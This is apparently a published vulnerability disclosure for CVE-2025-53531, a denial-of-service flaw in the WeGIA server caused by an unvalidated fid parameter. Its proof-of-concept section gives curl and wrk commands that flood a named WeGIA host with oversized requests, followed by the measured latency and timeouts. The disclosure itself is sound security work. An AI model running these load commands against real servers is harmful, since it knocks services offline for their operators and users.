Featured image of post CVE-2025-53531

CVE-2025-53531

Denial of Service (DoS)

CVE-2025-53531: Uncontrolled Resource Consumption in WeGIA parameter fid

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-53531

Summary

The Wegia server has a vulnerability that allows excessively long HTTP GET requests to a specific URL. This issue arises from the lack of validation for the length of the fid parameter. Tests confirmed that the server processes URLs up to 8,142 characters, resulting in high resource consumption, elevated latency, timeouts, and read errors. This makes the server susceptible to Denial of Service (DoS) attacks.

Details

Vulnerable Endpoint: GET https://comfirewall.wegia.org:8000/WeGIA?fid=111251&file_url=111256&param1=AAAA&param2=BBBB&param3=CCCC...

  • The URL accepts parameters concatenated with &, allowing attackers to add an arbitrary amount of data up to 8,142 characters.
  • There is no validation for the total URL length or the number of parameters processed by the server.
  • During testing, the URL was extended with repeated parameters (¶m=-value-), causing resource exhaustion and server instability.

PoC

Steps to reproduce the issue:

  • Execute the following HTTP GET request to reproduce the issue:

1
  curl "https://comfirewall.wegia.org:8000/WeGIA?fid=111251&file_url=111256$(python3 -c 'print("&param=" + "X"*8000)')"

  • To simulate a high-load attack, use the wrk tool:

1
  wrk -t12 -c400 -d60s "https://comfirewall.wegia.org:8000/WeGIA?fid=111251&file_url=111256$(python3 -c 'print("&param=" + "X"*8000)')"

Updated Test Results with wrk:

  • Requests Processed: 20,799 requests in 1 minute, with 330.90 MB read.
  • Average Latency: 280.91ms, peaking at 2 seconds.
  • Errors: 98 read errors and 591 timeouts occurred.
  • Request Rate: 346.07 requests/sec.
  • Data Transfer: 5.51 MB/sec.

Impact

This is a Denial of Service vulnerability. Any unauthenticated user with access to tools like OWASP ZAP can exploit this issue to make the server unresponsive. This affects the availability of the application and could disrupt business operations. The lack of rate limiting and recursive crawling restrictions increases the risk and makes the vulnerability exploitable by low-skilled attackers.

Reference

https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-4ffc-f23j-54m3

Finder

Rafael Corvino

Contributors

Diego Castro

Elisangela Mendonça

Natan Maia Morette

By: CVE-Hunters

Built with Hugo
Theme Stack designed by Jimmy